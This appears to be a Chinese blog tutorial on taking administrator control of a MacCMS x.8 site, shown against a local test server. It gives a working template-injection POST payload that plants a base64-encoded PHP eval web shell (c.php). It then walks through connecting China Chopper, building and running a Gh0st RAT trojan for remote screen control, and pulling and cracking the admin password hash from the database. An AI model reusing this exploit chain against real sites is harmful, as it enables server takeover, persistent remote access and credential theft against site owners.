苹果cms x.8 取管理员权限

用到的工具

· 火狐插件:hackbar
· 中国菜刀
· gh0st
· 苹果 cms 历史漏洞:https://blog.csdn.net/m0_37438418/article/details/81006161

操作步骤

  1. 下载火狐插件 hackbar ,在苹果 cms 的主页搜索界面:(临时搭的站)
    http://192.168.0.137/
    在这里插入图片描述

2.按下 F12 点 HackBar , 选择 Post data 填写如下内容,点击 Execute 按钮

·http://192.168.0.137/index.PHP?m=vod-search
·wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x
MD5解密:<?php @eval($_POST[c]); ?>1
就是创建 c.php 传入参数 c

在这里插入图片描述
3.打开中国菜刀,右键 -> 添加 。输入以下内容:
在这里插入图片描述
4. 找到 config.php 文件,打开:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
5.打开 Gh0st 。选项 -> 创建客户 , 输入以下信息后测试连接:
在这里插入图片描述
在这里需要查找合适的端口,尽量选择数字大的端口,查看此端口是否被占用,如果被占用则结束占用此端口的进程:
在这里插入图片描述
在这里插入图片描述

  1. 如果测试连接成功,点击 “生成” 按钮 , 将木马文件保存。
    在这里插入图片描述
  2. 把 server.exe 放入菜刀(直接拖进去)
    在这里插入图片描述
  3. 打开菜刀 右键 -> 虚拟终端 , 输入 server.exe 执行木马文件。之后会在Gh0st 下看到被连接的用户。
    在这里插入图片描述
    在这里插入图片描述
  4. 右键 -> 屏幕控制 ,右键 -> 控制屏幕 。 打开 Phpstudy -> MySQL 管理器 -> MySQL-Front
    在这里插入图片描述
    10 找到在config.php 里对应的数据库名 “maccms” , 打开可疑的表 “mac_manager”

管理员账号:admin
管理员密码:a66abb5684c45962d887564f08346e8d
解密后:admin123456

在这里插入图片描述
登录后台:
在这里插入图片描述
成功!
在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值